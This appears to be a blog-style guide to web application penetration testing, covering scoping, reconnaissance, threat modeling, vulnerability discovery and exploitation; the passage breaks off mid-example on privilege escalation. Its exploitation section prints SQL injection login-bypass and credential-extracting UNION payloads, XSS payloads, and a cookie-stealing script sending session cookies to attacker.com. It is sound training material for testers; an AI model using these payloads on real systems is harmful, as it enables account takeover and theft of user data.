
Conducting a Comprehensive Web Application Penetration Test

29 July 2025 · 60 min read

Guide · PenTest

Penetration testing is a structured process of simulating real-world cyberattacks on an organization’s systems to identify and address vulnerabilities before attackers exploit them. This guide provides an expert-level walkthrough of a complete penetration test from start to finish, focusing on web applications as the primary target. While our emphasis is on web platforms, the methodologies and insights described here apply broadly to other environments as well, including API endpoints, mobile applications, and cloud infrastructures. The core phases – from careful planning to final reporting – remain fundamentally the same across these domains. By following a standardized methodology (such as the widely adopted Penetration Testing Execution Standard, PTES), testers ensure that every stage of the test, from scoping and planning to exploitation and reporting, is handled in a consistent and thorough manner. The result is a penetration test that not only uncovers technical weaknesses but also provides actionable guidance aligned with industry best practices and compliance requirements.

In the sections below, we detail each phase of a penetration test, explain its purpose, and provide practical examples and tools. We will also highlight common web attack scenarios (e.g., SQL injection, XSS, authentication bypass) with real-world payload snippets that can double as a handy cheat sheet. Finally, we discuss how to align the pen test process with compliance frameworks like ISO 27001, PCI-DSS, and GDPR, and we outline a structured approach to reporting the results (including an executive summary, technical findings with severity ratings, remediation guidance, and compliance impact mapping). This comprehensive approach ensures that the penetration test is not only technically effective but also business-aligned, helping security professionals, developers, IT managers, CISOs, and consultants communicate findings and improve security postures in a meaningful way.

Scoping and Planning

The first phase, often called Pre-Engagement Interactions or scoping, sets the foundation for a successful penetration test. This planning stage is crucial to define what will be tested, how the test will be conducted, and under what constraints. The tester and the client organization establish the engagement’s scope (target systems, applications, networks, and specific in-scope components) as well as the rules of engagement. Key considerations in this phase include:

  • Objectives and Goals: Clarify what the client hopes to achieve (e.g., assessing the security of a new web application, meeting compliance requirements, etc.). Understanding business objectives helps prioritize critical systems and high-risk areas.
  • Logistics and Schedule: Determine the testing timeline, including start and end dates, testing windows (especially if there are restricted hours to avoid peak usage), and communication channels. Ensure stakeholders on both sides know when testing will occur to avoid confusion with real attacks.
  • Legal and Authorization: Obtain proper written permission to test the targets. This typically involves signing an NDA (Non-Disclosure Agreement) and a Rules of Engagement document. Legal authorization protects the tester and the client by clearly sanctioning the activity. It also defines what actions are prohibited (for example, causing deliberate denial of service may be off-limits unless explicitly allowed).
  • Testing Boundaries: Define in-scope vs. out-of-scope assets. For instance, the test may include the production web application and a staging API, but explicitly exclude the corporate email server or third-party services. This prevents accidental impact on systems that should not be tested. If cloud resources or third-party APIs are in scope, ensure those providers are also notified/cleared.
  • Methodology and Test Types: Agree on the type of test approach – black box, gray box, or white box. In a black-box test, the tester has no prior knowledge of the target’s internal workings (simulating an external attacker). In a white-box test, full information (source code, architecture diagrams, credentials, etc.) is provided to simulate an insider or to maximize coverage. Gray-box is a mix, with limited information shared. This choice will influence how the test is executed. Also plan whether social engineering or physical tests are included (for web platform tests these are often out of scope, but phishing or phone-based social engineering might be considered if the goal is broader).
  • Compliance Considerations: If the test is being conducted for compliance (e.g., PCI-DSS, ISO 27001) or customer assurance, note any specific requirements. For example, PCI-DSS may require both external and internal tests; GDPR concerns might limit testing on production personal data. Aligning the plan with these needs ensures the results will support the necessary compliance reports.
  • Tools and Resources: Identify any specific tools, frameworks, or credentials needed. For instance, ensure the tester has accounts with appropriate access if it’s a credentialed test, or gather open-source intelligence resources if needed. While specific tools are usually chosen later (Reconnaissance and beyond), planning may involve getting approval for certain testing tools or techniques if they could be disruptive.
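Many teams capture these agreements in a short scope file that both sides sign off on and that the tester’s tooling can consume. A minimal sketch of such a file is below – every hostname, date, and contact in it is hypothetical, not a prescribed format:

```yaml
# Hypothetical scope/rules-of-engagement file -- all values are illustrative
engagement: webapp-pentest-2025
window:
  start: "2025-08-04T09:00Z"
  end:   "2025-08-15T17:00Z"
approach: gray-box                    # black-box | gray-box | white-box
in_scope:
  - https://app.example.com           # production web application
  - https://staging-api.example.com   # staging API
out_of_scope:
  - mail.example.com                  # corporate email server
  - "*.thirdparty-cdn.com"            # third party, not authorized
prohibited:
  - denial-of-service
  - modification-of-production-data
contacts:
  client: soc@example.com             # emergency stop channel
  tester: pentest-lead@assessor.example
```

Keeping scope in a structured file like this also lets scanners and scripts read their allowed targets from one agreed source instead of ad-hoc notes.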

Effective scoping avoids misunderstandings and paves the way for a smooth test. At the end of this phase, both parties should have a shared understanding of the test’s scope, timeline, and rules. Documentation from this stage may include a Scope Definition document, a Rules of Engagement contract, and a Test Plan outlining methodologies to be used. Proper planning ensures that the penetration test is goal-oriented and respects the operational needs of the target environment.

Reconnaissance (Passive and Active)

After planning, the tester moves into Reconnaissance, the information-gathering phase. Reconnaissance (often split into passive and active recon) is critical for understanding the target’s footprint and identifying potential attack vectors. In the context of a web platform, reconnaissance will involve gathering information about the target web application, its infrastructure, and any related assets (like APIs, subdomains, etc.), all without actually exploiting anything yet.

Passive Reconnaissance: In passive recon, the tester collects information without directly interacting with the target in a way that would alert or affect it. This often means leveraging publicly available data sources and OSINT (Open-Source Intelligence). Key passive recon activities include:

  • Footprinting and OSINT: Searching the web for information leakage about the application or organization. This could involve Google dorking (crafting Google queries to find sensitive info), scanning pastebin and GitHub for leaked credentials or API keys, and reading technical forums or social media for clues. For example, a Google search might uncover an old employee CV listing the technologies used in the web app, or a GitHub repository might accidentally contain API secrets.
  • Domain and DNS Recon: Identifying all domain names and subdomains related to the target. Tools like OWASP Amass or Sublist3r can enumerate subdomains via OSINT, and certificate transparency logs can reveal hostnames. WHOIS lookups can provide registrar info and perhaps contacts or infrastructure details. Passive DNS databases can show historical DNS records.
  • Public Breach Data: Checking if any known data breaches involved the target domain (using services like HaveIBeenPwned or similar) to gather credential patterns or older passwords that might still be in use.
  • Infrastructure Information: Looking at technologies the site uses by examining HTTP responses or using fingerprinting tools (e.g., BuiltWith or Wappalyzer) to list frameworks, server software, or third-party services. This helps later in identifying known vulnerabilities in those components.
  • Social Engineering Intelligence: If allowed, gather names and roles of key employees via LinkedIn or company sites – useful for potential phishing or guessing common usernames. This is more peripheral for a strictly web app test, but part of broader recon if social engineering is in scope.

Importantly, passive recon is performed without sending direct packets to the target systems – it uses third-party databases, search engines, and public sites, so it’s generally stealthy. For example, a tester might find an old conference presentation by the company’s engineers that describes their web app architecture, which could reveal an API endpoint URL or database type.
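Certificate transparency mining, mentioned above, is easy to script. crt.sh exposes a JSON export (https://crt.sh/?q=%25.example.com&output=json) whose records carry one hostname per line in a name_value field. The sketch below parses such an export offline – the sample data is invented, and only the field used here is shown:

```python
import json

def extract_subdomains(crtsh_json: str, domain: str) -> list[str]:
    """Collect unique hostnames for `domain` from a crt.sh JSON export.

    Each crt.sh record's `name_value` field holds one hostname per line;
    wildcard entries like *.example.com are normalized to the bare domain.
    """
    hosts = set()
    for record in json.loads(crtsh_json):
        for name in record.get("name_value", "").splitlines():
            name = name.strip().lstrip("*.").lower()
            if name.endswith(domain):
                hosts.add(name)
    return sorted(hosts)

# Invented offline sample in the shape crt.sh returns (trimmed to one field)
sample = '''[
  {"name_value": "www.example.com\\napi.example.com"},
  {"name_value": "*.example.com"},
  {"name_value": "admin.example.com"}
]'''
```

Running `extract_subdomains(sample, "example.com")` yields a deduplicated, sorted host list that feeds directly into the active recon phase.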

Active Reconnaissance: Active recon involves interacting with the target environment to discover information. This phase does send traffic to the target systems but stops short of actual exploitation. The goal is mapping the attack surface: identifying open ports, services, application endpoints, user entry points, etc. Key active recon steps include:

  • Network Scanning: Using tools like Nmap to scan the target server(s) for open ports and running services. For a web application, this might reveal additional services besides HTTP/HTTPS – for instance, an open SSH or database port on the same server. Nmap scripts (NSE) can also do service version detection and basic vulnerability checks.
  • Enumeration of Websites and APIs: Actively exploring the web application to catalog its endpoints and functionalities. This often means running a web crawler (such as the one built into Burp Suite or OWASP ZAP) to enumerate all pages, forms, and parameters. Directory brute forcing tools like Dirbuster or ffuf/Wfuzz can find hidden files or directories (e.g., backup files, admin panels) by trying common names.
  • Service Banner Grabbing: Capturing service banners or responses to identify software versions (e.g., the HTTP Server header might reveal the web server and version, or an SMTP banner on port 25 might leak its mail server version). This is useful for later vulnerability research.
  • Active DNS Probing: Using DNS zone transfer attempts (if misconfigured), or brute forcing subdomains (as active complement to passive findings). Tools like dnsrecon or Fierce can help here.
  • Email and Employee Enumeration: If relevant, verify corporate email format or gather a list of user accounts (sometimes via tools like theHarvester, which does search engine scraping for emails). This could be used in password spraying or username enumeration later (relevant if the web app uses corporate single sign-on, for instance).
  • Cloud Asset Discovery: If the app is hosted in the cloud, active recon might involve checking for misconfigured S3 buckets or Azure blobs, etc., that are publicly accessible. Tools or scripts designed for cloud recon (like AWS CLI for listing open S3 buckets if guessable, or tools like CloudMapper) might be employed.
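Content discovery from the list above boils down to generating candidate URLs from a wordlist and flagging anything that does not return 404. A sketch of the candidate generation follows – the wordlist, extensions, and base URL are illustrative stand-ins (real runs use lists like SecLists’ common.txt):

```python
from urllib.parse import urljoin

# Tiny stand-in wordlist; real engagements use thousands of entries
WORDLIST = ["admin", "backup", "config", "uploads"]
EXTENSIONS = ["", ".php", ".bak"]

def candidate_urls(base: str, words: list[str], exts: list[str]) -> list[str]:
    """Build the URL candidates a tool like ffuf or Gobuster would request."""
    return [urljoin(base, f"{word}{ext}") for word in words for ext in exts]

# Probing is then one HTTP request per candidate; anything that is not a
# plain 404 (200, 301, 403 all matter) is worth a closer look:
#
#   import urllib.request, urllib.error
#   for url in candidate_urls("https://app.example.com/", WORDLIST, EXTENSIONS):
#       try:
#           code = urllib.request.urlopen(url, timeout=5).status
#       except urllib.error.HTTPError as err:
#           code = err.code
#       if code != 404:
#           print(code, url)
```

Note that a 403 on `/admin` is still a finding: the path exists, and access control around it becomes a manual-testing target later.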

Active recon must be done carefully to avoid triggering security alarms too early. Many testers start with stealthier scans (e.g., slow-paced Nmap scans or specific target probes) to map the surface without causing heavy traffic.

During recon, testers often compile a list of discovered hosts, ports, and application entry points. For example, the reconnaissance might reveal a subdomain like api.example.com hosting a backend API, or find that admin.example.com exists and presents a login page – indicating an administration portal that could be a high-value target. All these findings feed into the next phase by highlighting where threats might exist.

Tools and Techniques for Recon:

  • Passive Recon Tools: Search engines (Google, Bing dorks), Shodan (for finding devices or services by banner), theHarvester (to collect emails and subdomains from public sources), and certificate transparency logs (via tools like crt.sh). Social media and LinkedIn for gathering personal info. Public code repos (GitHub searches for the company name).
  • Active Recon Tools: Nmap (port scanning and service enumeration), Amass (active subdomain enumeration combining OSINT and brute force), Burp Suite’s Spider for crawling, OWASP ZAP for passive scan while browsing, Nikto (a simple web server scanner for known vulnerabilities and misconfigs), and WhatWeb or Nmap http-enum script for identifying web platform technologies. For DNS: dnsrecon or Fierce. For content discovery: Dirbuster/Dirb, Gobuster, or Wfuzz to brute force URL paths.

By the end of Reconnaissance, the tester should have a map of the attack surface: a list of IPs/domains, open ports/services, software versions, and web application endpoints (URLs, parameters, forms). This map is the basis for the next steps – Threat Modeling and Vulnerability Discovery – where we analyze these areas for potential weaknesses. As security expert Michael Simpson aptly noted, finding vulnerabilities requires both broad scanning and focused analysis: regular scanning (external and internal) will uncover many known weaknesses, but it’s the deep manual probing that finds the subtle issues.

Threat Modeling and Attack Surface Mapping

In the Threat Modeling and Attack Surface Mapping phase, information gathered from recon is analyzed to postulate how an attacker might attempt intrusions. Essentially, the tester steps back and asks: Given what we know about the system, what are the likely targets and attack vectors? Threat modeling often involves identifying the key assets, entry points, and threat agents, then mapping possible attacks to those points.

For a web platform, this phase might include:

  • Identifying High-Value Assets: Determine what data or functionality in the application would be most valuable or damaging if compromised. This could be personal customer data, financial information, intellectual property, or administrative controls. For example, an online banking site’s high-value assets include account balances and transfer functionality; an e-commerce site might prioritize customer info and payment processing.
  • Mapping Application Architecture: Understand how the application is structured. Is it a classic three-tier app with web, application, and database servers? Is there a content delivery network (CDN) or cloud services integrated? Identify trust boundaries (e.g., front-end vs. back-end communications, third-party integrations) where data flows in/out – these often become attack points (for instance, an API that the mobile app uses could be a weak link).
  • Enumerating Entry Points: List all the ways an attacker could interact with the system. This includes web form inputs, URL parameters, file upload interfaces, API endpoints, authentication portals, and even less-obvious points like email inputs (for injection via contact forms) or OAuth redirects. Don’t forget out-of-band channels: if the web app sends notifications or integrates with mobile push, those could be vectors too.
  • Threat Scenarios: Using models like STRIDE (Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, Elevation of Privilege) or ATT&CK, think of potential threats for each entry point. For example, for a login page (entry point) – threats include credential stuffing, SQL injection in the login form, brute force attacks, or session hijacking. For a file upload feature – threats include uploading web shells or malicious files to execute code.
  • Prioritizing Attack Vectors: Not all discovered points are equal. Threat modeling helps prioritize likely attack paths. If recon showed the web server is running an outdated version with known exploits, that’s a priority. If an admin portal was found, that’s high priority due to potential high impact. Essentially, rate findings by likelihood and impact.
  • Attacker Profiles: Consider different attacker profiles (external hacker, malicious insider, etc.) and how they might approach the system. For web apps, the primary profile is an external remote attacker (maybe an anonymous user or someone with a basic user account trying to escalate privileges). However, if insiders are in scope, threat modeling might also consider what an employee with limited access could do (for instance, a user of the app trying to access other users’ data).
  • Attack Surface Visualization: It can be helpful to create a simple diagram or list that maps out the relationships: e.g., User -> Web Frontend -> API -> Database, and note known vulnerabilities or misconfigs at each layer from recon. Mark the trust boundaries and data flows. This visualization clarifies how an exploit in one area might pivot to another (for example, a SQL injection in the API could lead to database access, which might store hashed passwords that could be cracked offline).
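The prioritization step above can be made explicit with a simple likelihood × impact product. This is a sketch rather than a standard formula – the entry points and the 1–5 scores below are invented examples of how recon findings get ranked:

```python
def risk_score(likelihood: int, impact: int) -> int:
    """Both inputs on a 1-5 scale; a higher product means test it earlier."""
    return likelihood * impact

# Hypothetical entry points with hypothetical ratings
entry_points = [
    {"name": "admin login page",       "likelihood": 4, "impact": 5},
    {"name": "profile picture upload", "likelihood": 3, "impact": 4},
    {"name": "public search form",     "likelihood": 4, "impact": 3},
    {"name": "password reset email",   "likelihood": 2, "impact": 4},
]

def prioritize(points: list[dict]) -> list[dict]:
    """Order entry points from highest to lowest risk score."""
    return sorted(points,
                  key=lambda p: risk_score(p["likelihood"], p["impact"]),
                  reverse=True)
```

Even this crude ranking makes the test plan defensible: when time runs out, the report can show that the highest-scoring vectors were covered first.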

Often, threat modeling and vulnerability analysis go hand-in-hand. The tester uses the intel from recon to hypothesize where vulnerabilities likely reside and then focuses analysis efforts there. For instance, if recon revealed an /admin page, threat modeling would flag that as a critical area to test for authentication bypass or default credentials.

According to the PTES and other methodologies, in this stage the tester identifies potential targets and maps attack vectors, using the intel gathered. Some common categories of assets to consider during threat modeling include sensitive data stores (customer databases, confidential files), critical business services (payment gateways, order processing), admin interfaces, and integrations with external systems. By cataloguing these, the tester creates a blueprint of “what’s at stake” and “how it could be attacked.”

Example: Imagine a web application that allows users to upload profile pictures and also has an admin panel for managing users. Threat modeling would note the file upload feature as a risk area (possible file inclusion or stored XSS if images are not handled safely). It would also identify the admin panel as high value: perhaps consider brute force or SQL injection on the admin login, or privilege escalation if a regular user can somehow access admin functions. If the recon found that the site uses a certain JavaScript library with known XSS issues, threat modeling flags that for testing.

At this phase, testers may also use threat modeling tools (like OWASP Threat Dragon or Microsoft’s Threat Modeling Tool) to systematize the process, though many experienced testers do it informally using checklists and intuition. They might cross-reference known attack lists like the OWASP Top 10 or SANS 25 to ensure all common web vulnerability categories are considered against the target.

Attack Surface Reduction Check: Sometimes threat modeling also informs immediate fixes – if something is obviously out of scope or not needed, the client might be advised to disable it before testing (though usually that’s addressed post-test). But generally, any glaring issues found in recon (like an open database port) are noted as very likely paths to attempt in exploitation.

By the end of this phase, the tester has a clear plan of attack: a prioritized list of potential vulnerabilities to validate and exploit. This guides the next phase, Vulnerability Discovery, to ensure the testing is thorough and focused on the most relevant risks. Essentially, Threat Modeling turns raw recon data into an actionable attack plan, ensuring that no significant threat is overlooked in the subsequent active testing.

Vulnerability Discovery (Automated and Manual)

The Vulnerability Discovery phase is where the tester actively probes the target to find security weaknesses. This phase combines automated scanning techniques with manual testing to uncover as many vulnerabilities as possible. The goal is to identify all points where the system deviates from secure behavior – misconfigurations, outdated software, coding flaws, and logic errors – and to validate those findings. It’s often helpful to think of this phase in two parts: Automated scanning for broad coverage and Manual deep-dive testing for subtle issues.

Automated Vulnerability Scanning: Automated tools can quickly scan the application and underlying systems for known issues. These tools are like a “first pass” – efficient at finding common vulnerabilities and low-hanging fruit, but they might miss complex logic flaws or novel issues. Examples of automated scanning in a web context include:

  • Web Vulnerability Scanners: Tools like OWASP ZAP (open-source) or Acunetix, Netsparker, Burp Suite scanner (commercial) can crawl the web application and test for a plethora of issues (SQL injection, XSS, CSRF, file inclusion, etc.). They inject payloads into parameters and analyze responses for signs of vulnerabilities (e.g., an alert in the page or an SQL error in the response).
  • Network/Port Scanners with Vuln Detection: If the scope includes the server, running Nessus, OpenVAS, or QualysGuard can check the server and OS for known CVEs (Common Vulnerabilities and Exposures) based on service banners and probe responses. For example, they might detect that the web server is running Apache version X.Y which has a known remote code execution CVE.
  • Dependency Scanners: If some access to the code or at least the list of front-end libraries is known (sometimes package manifests are publicly accessible or can be inferred from loaded scripts), tools can identify known vulnerable versions (like retire.js for JS libraries).
  • Configuration Scans: Tools or scripts to check common config issues (for instance, testing whether directory listing is enabled on web directories, or whether default admin pages such as /phpmyadmin/ are accessible). Nikto is a classic lightweight scanner that checks for over 6000 potentially dangerous files/versions on web servers.
  • Authentication/Session Checks: Some automated tools will also test cookie settings (for secure flags, HTTPOnly), SSL/TLS configuration (protocol strength, known weaknesses via tools like SSL Labs scanner), and other best-practice configurations.
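The cookie checks in the last bullet are simple enough to script directly. The sketch below inspects a raw Set-Cookie header for the common hardening attributes; the header values are examples, and this is a rough parser rather than a full RFC 6265 implementation:

```python
def missing_cookie_flags(set_cookie_header: str) -> list[str]:
    """Report which common hardening attributes a Set-Cookie header lacks.

    Attributes after the first `name=value` pair are compared
    case-insensitively against Secure, HttpOnly, and SameSite.
    """
    attrs = [part.strip().split("=")[0].lower()
             for part in set_cookie_header.split(";")[1:]]
    wanted = {"secure": "Secure", "httponly": "HttpOnly", "samesite": "SameSite"}
    return [label for key, label in wanted.items() if key not in attrs]
```

A finding like "session cookie missing Secure and SameSite" is low severity on its own, but it compounds the impact of any XSS or network-interception issue found later.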

Automated scans will generate a list of potential findings. It’s crucial to review and validate these because scanners can produce false positives or findings of varying severity. For instance, an automated scan might flag a verbose error message or a missing security header – useful to note, but not every such finding is a critical issue.

Manual Testing: Manual testing is where the penetration tester’s expertise is fully exercised. A human tester can perform contextual, creative tests that tools cannot. Manual techniques include:

  • Fuzzing Inputs: Using tools like Burp Suite Intruder or ffuf to systematically fuzz parameters with custom payloads. For example, fuzzing an upload file parameter with different file types or fuzzing an id parameter with SQL injection payloads to see how the application responds.
  • Testing Business Logic: Automated tools struggle with logic flaws (e.g., “can user A access user B’s data if they change the userID in the request?”). Testers manually attempt things like Insecure Direct Object References (IDOR) by changing identifiers, skipping steps in multi-step processes (like bypassing a payment step), or performing actions out of expected sequence. For instance, manually test if you can place an order with a negative price, or apply the same coupon multiple times – things specific to the application’s logic.
  • Authentication and Authorization Flaws: Manually verify the strength of authentication. Try common default credentials (like admin/admin, test/test) on login pages. Attempt to brute force if lockout is not in place (using a tool like Hydra or Burp Intruder with a password list). For authorization, if multiple roles exist (user vs admin), test horizontal and vertical privilege escalation: e.g., as a normal user try accessing admin functionality or another user’s data by altering URLs or IDs. These tests often require logging in as different users and comparing responses – a very manual process.
  • Session Management: Check if session tokens can be predicted or if they’re properly invalidated on logout. For example, observe session cookies and attempt to reuse them after logout or see if session fixation is possible (setting a known session ID).
  • Injection Attacks: Beyond what scanners do, manually craft tailored injection payloads for SQL, XSS, XML, command injection, etc., especially if the app is not standard. For SQL injection, a tool like SQLMap can automate exploitation once a suspect parameter is found, but the tester must guide it. For XSS, testers will manually try variants to bypass filters, using tricks that automated scanners might not know. The tester might also test for less common injections like Server-Side Template Injection (SSTI), HTTP header injections, etc., based on the tech stack.
  • File Upload and Path Traversal: If file uploads are allowed, manually attempt to upload malicious files (like a .php webshell if it’s a PHP server) or files with path traversal (../) in the filename to see if the file system can be accessed. Also test downloading or viewing files via path parameters to find LFI (Local File Inclusion) or directory traversal vulnerabilities.
  • Client-Side and API Testing: Use developer tools and proxies to inspect API calls made by web or mobile clients. Test those APIs directly for missing access controls (e.g., try calling an admin API as a normal user). Also inspect JavaScript for clues (hidden endpoints, API keys).
  • Cryptographic issues: If the application uses encryption (tokens, cookies), analyze if it’s using hardcoded secrets or weak algorithms. For example, a JWT token might not be signed or might use a guessable secret – a manual tester might attempt to crack or fake a token if the algorithm looks weak.

A skilled tester will verify each suspected vulnerability manually, even if found by a scanner, to eliminate false positives and to gauge the actual impact. For example, if a scanner reports an “SQL injection,” the tester will try to hand-inject something like ' OR '1'='1 to see if it truly bypasses login, confirming the finding. Likewise, for XSS, the tester will attempt an actual script payload in the relevant field to see if it executes in a browser.

It’s often said that both automated and manual testing are essential for a comprehensive assessment – automated tools provide breadth, and manual testing provides depth. Automated scans might uncover 80% of common issues quickly, but the remaining 20% – often the most dangerous or unique flaws – require a human eye and creativity.

Throughout this phase, documentation is key. The tester keeps notes of each potential vulnerability, how it was tested, and the result (sometimes capturing screenshots or tool output). If something is found, they may also prepare proof-of-concept payloads or exploits to use in the next phase (Exploitation). Conversely, if no vulnerability is found in a particular area, it’s good to note what was attempted – this can be useful for the report to demonstrate coverage.

By the end of Vulnerability Discovery, the tester should have a list of confirmed (or highly suspected) vulnerabilities in the target web application and infrastructure. This list might include issues like “SQL Injection in search parameter allows extracting user data”, “Reflected XSS on the feedback form”, “Admin portal has default credentials”, “Outdated OpenSSL library with known CVE-XXXX-YYYY”, etc., each with evidence. This feeds directly into the Exploitation phase, where the tester will actively use these vulnerabilities to demonstrate impact.

Exploitation

In the Exploitation phase, the penetration tester takes the confirmed vulnerabilities from the discovery phase and actively uses them to gain unauthorized access or perform unauthorized actions on the target. This phase answers the question: What can a malicious actor achieve by exploiting these weaknesses? It’s where theoretical findings turn into demonstrable impact – e.g., extracting data, defacing the site, or taking over an account (all within the agreed scope and rules, of course).

The approach to exploitation is typically: prioritize exploits for high-impact vulnerabilities first, while maintaining stealth and safety (especially if testing a live production system). The tester will attempt to go as far as allowed by scope – for instance, if the goal is to see if a customer database can be dumped, they will push until that’s achieved, but if the rules forbid altering data, they might stop short of something like creating new admin users unless permitted. Throughout this phase, careful notes are kept on what was done, both for reporting and in case something needs to be rolled back.

Let’s look at some example attack scenarios and how a tester might exploit them, complete with real-world payloads/snippets to illustrate:

Example: SQL Injection Exploitation

Scenario: During discovery, the tester found that a certain HTTP GET parameter (e.g., ?id= on a product page) is vulnerable to SQL injection. Exploitation involves using this flaw to retrieve sensitive data or bypass security controls.

One common critical impact of SQL injection is authentication bypass. For example, suppose the application has a login form that is susceptible to SQL injection in the username field. An attacker can supply a crafted input that tricks the application into logging them in without valid credentials. A classic payload is:

' OR 1=1--

When entered as a username (along with any password), this payload might transform the backend SQL query into a condition that is always true. For instance, the query might become:

SELECT * FROM users WHERE username = '' OR 1=1-- ' AND password = 'password';

Because the OR 1=1 always yields true (and the -- comments out the rest of the query), the database returns the first user in the table – often the admin. As a result, the tester (or attacker) is logged in as that first user, effectively bypassing authentication altogether. Indeed, using ' OR 1=1-- in a vulnerable login field is a time-tested technique to gain admin access without credentials.
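These mechanics are easy to reproduce end to end against a throwaway in-memory database. The sketch below uses Python’s built-in sqlite3 module; the schema and credentials are invented for the demonstration, and the parameterized variant shows why prepared statements defeat the payload:

```python
import sqlite3

# Disposable demo database with an invented user table
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
conn.execute("INSERT INTO users VALUES ('admin', 's3cret')")

def vulnerable_login(username: str, password: str):
    # UNSAFE: user input concatenated straight into the SQL string
    query = (f"SELECT username FROM users "
             f"WHERE username = '{username}' AND password = '{password}'")
    row = conn.execute(query).fetchone()
    return row[0] if row else None

def safe_login(username: str, password: str):
    # Parameterized query: the payload is treated as data, never as SQL
    row = conn.execute(
        "SELECT username FROM users WHERE username = ? AND password = ?",
        (username, password)).fetchone()
    return row[0] if row else None
```

Feeding the classic payload as the username logs the vulnerable version in as admin with a wrong password, while the parameterized version correctly rejects it, which is exactly the remediation the report will recommend.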

Beyond login bypass, SQL injection exploitation can allow data extraction. Testers can use payloads like UNION SELECT statements to fetch data from other tables. For example, if a search field is vulnerable, a union-based injection might be:

' UNION SELECT username, password, credit_card FROM users-- 

This would append a second query result combining user credentials and credit card info (just as an illustrative example) to the original query’s results, exposing sensitive data in the web page if the output is visible. In more covert cases (like blind SQL injection), the tester might use time delays (e.g., '; SELECT CASE WHEN (condition) THEN pg_sleep(5) ELSE pg_sleep(0) END-- on PostgreSQL) or out-of-band network calls to exfiltrate data.
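Union-based extraction can be demonstrated the same way against a disposable database. The products/users schema below is invented, and the payload mirrors the UNION technique just described – it closes the LIKE clause, unions in a different table, and comments out the remainder:

```python
import sqlite3

# Disposable demo database with invented product and user data
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE products (name TEXT, price TEXT);
    INSERT INTO products VALUES ('Widget', '9.99');
    CREATE TABLE users (username TEXT, password TEXT);
    INSERT INTO users VALUES ('admin', '5f4dcc3b5aa7');
""")

def search(term: str):
    # UNSAFE concatenation -- this is the injection point
    query = f"SELECT name, price FROM products WHERE name LIKE '%{term}%'"
    return conn.execute(query).fetchall()

# Matches nothing in products, then UNIONs the users table into the output
payload = "zzz%' UNION SELECT username, password FROM users--"
```

Here the search results page would render usernames and password hashes where product names belong – which is why union-based injection needs the attacker to match the column count of the original query.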

Often, testers will employ tools like SQLMap to automate deep extraction once they confirm a SQLi. SQLMap can dump entire databases by iteratively exploiting the injection. But using it still requires caution and sometimes tweaks to avoid disrupting the application.

Snippet (authentication bypass via SQLi):

Username: ' OR '1'='1
Password: [anything]

This input logs in the tester as the first user (e.g., admin) if the login form is vulnerable. After such a login, the tester might gain access to admin-only functionality, demonstrating a severe breach of authorization.

Example: Cross-Site Scripting (XSS) Exploitation

Scenario: The tester discovers that a certain parameter (say, a search query parameter or a profile name field) is reflected in the page without proper encoding, making it vulnerable to XSS. In exploitation, the goal is to execute JavaScript in a victim’s browser, which can be used to steal data or perform actions on behalf of the user.

For demonstration, testers often use a simple pop-up alert payload to show XSS execution. For example:

<script>alert("XSS")</script>

If the tester inputs this into a vulnerable field and the text is reflected on a page (and not sanitized), a dialog saying “XSS” will pop up in the browser. This proves that arbitrary script can run. While an alert is benign, the implication is that an attacker could inject any script – such as one to steal the user’s session cookie, redirect to a phishing site, or log keystrokes.

For instance, a more malicious XSS payload might steal cookies:

<script>new Image().src="http://attacker.com/stolen.php?cookie="+document.cookie</script>

This, when executed in a victim’s browser, would send their session cookie to the attacker’s server (allowing session hijack). A tester might not actually exfiltrate data to an external site during a test (to avoid legal issues), but they could simulate it or demonstrate the ability to do so by showing the payload.

XSS can be exploited in stored form as well – e.g., posting a script to a message board that triggers for any viewer. The tester will attempt to inject such payloads and then observe if other accounts (or their own account after logout) encounter the malicious script execution.

Snippet (simple XSS proof-of-concept):

<form action="/search"><input name="q" value='"><script>alert("XSS")</script>'></form>

(The above snippet illustrates an injection in a form field; when rendered by a vulnerable page, it would execute the script.)

Exploitation result: The tester confirms they can execute JavaScript on users’ browsers. They might demonstrate impact by, say, showing that they could hijack a demo account’s session or deface part of the webpage through DOM manipulation.
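The underlying flaw – reflecting input without encoding – can be reproduced in a few lines. A sketch (the page template is hypothetical) contrasting verbatim reflection with contextual output encoding via Python’s html.escape:

```python
import html

payload = '<script>alert("XSS")</script>'

# Vulnerable: user input reflected verbatim into the HTML response.
page_vulnerable = "<p>Results for: %s</p>" % payload
print("<script>" in page_vulnerable)  # True -- the script reaches the browser

# Safe: output encoding turns the markup into inert text.
page_safe = "<p>Results for: %s</p>" % html.escape(payload)
print("<script>" in page_safe)  # False -- rendered as text, never executes
```

Note that encoding is context-dependent: html.escape covers HTML body and attribute contexts, while JavaScript or URL contexts need their own encoders.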

Example: Privilege Escalation

Scenario: The tester has managed to gain a foothold – perhaps they created a low-privileged account on the web app via a registration function, or they found credentials allowing access to a limited user account. Now, the aim is to escalate privileges – either within the application (from a regular user to an admin user) or on the underlying system (from web application access to server system access with higher privileges). Privilege escalation is often a bridge between initial exploitation and full control of a system.

Application-Level Privilege Escalation: One common issue is an access control flaw where user input isn’t properly checked. For example, an e-commerce application might allow users to view their own orders via /order?order_id=12345. If the tester changes the number to someone else’s order (order_id=12344), and if the app doesn’t verify ownership, they might see another user’s order – that’s horizontal privilege escalation (user vs user data access). A more severe vertical escalation would be if a normal user discovers an admin-only function that isn’t properly protected. For instance, if there’s an admin panel link not visible to them by UI but still accessible by URL, and they can reach it just by knowing the URL (and the server doesn’t block it), that’s a serious issue. Testers will try various role manipulation tricks: modifying cookies or JWTs that encode roles, force-browsing to admin pages, or using a normal user account to call admin APIs by changing parameters like role=admin in requests, etc.

Another scenario: If password reset functionality is weak (e.g., not asking security questions properly or using predictable tokens), a tester might exploit that to reset an admin’s password and thus escalate to admin access.

System-Level Privilege Escalation: If the test involves exploiting the server (for instance, through a successful SQL injection leading to a shell, or an RCE vulnerability), the tester might end up with a shell on the web server as a low-privileged user (e.g., the web server runs as www-data on Linux). Now the task is to gain higher OS privileges (root on Linux or SYSTEM/Administrator on Windows). Techniques for this include: finding misconfigured SUID programs, exploiting known kernel vulnerabilities, abusing service configurations, or simply using stolen credentials. Tools like Metasploit’s Meterpreter have built-in scripts (e.g., the getsystem command on Windows) to automate privilege escalation attempts. For example, Meterpreter’s getsystem will try multiple techniques to elevate to SYSTEM on Windows (like named pipe impersonation). On Linux, a tester might run a local exploit for a known kernel bug (if the kernel is outdated) or exploit a cron job running as root with insecure settings.

Snippet (Linux privilege escalation via local exploit):

$ whoami
webuser
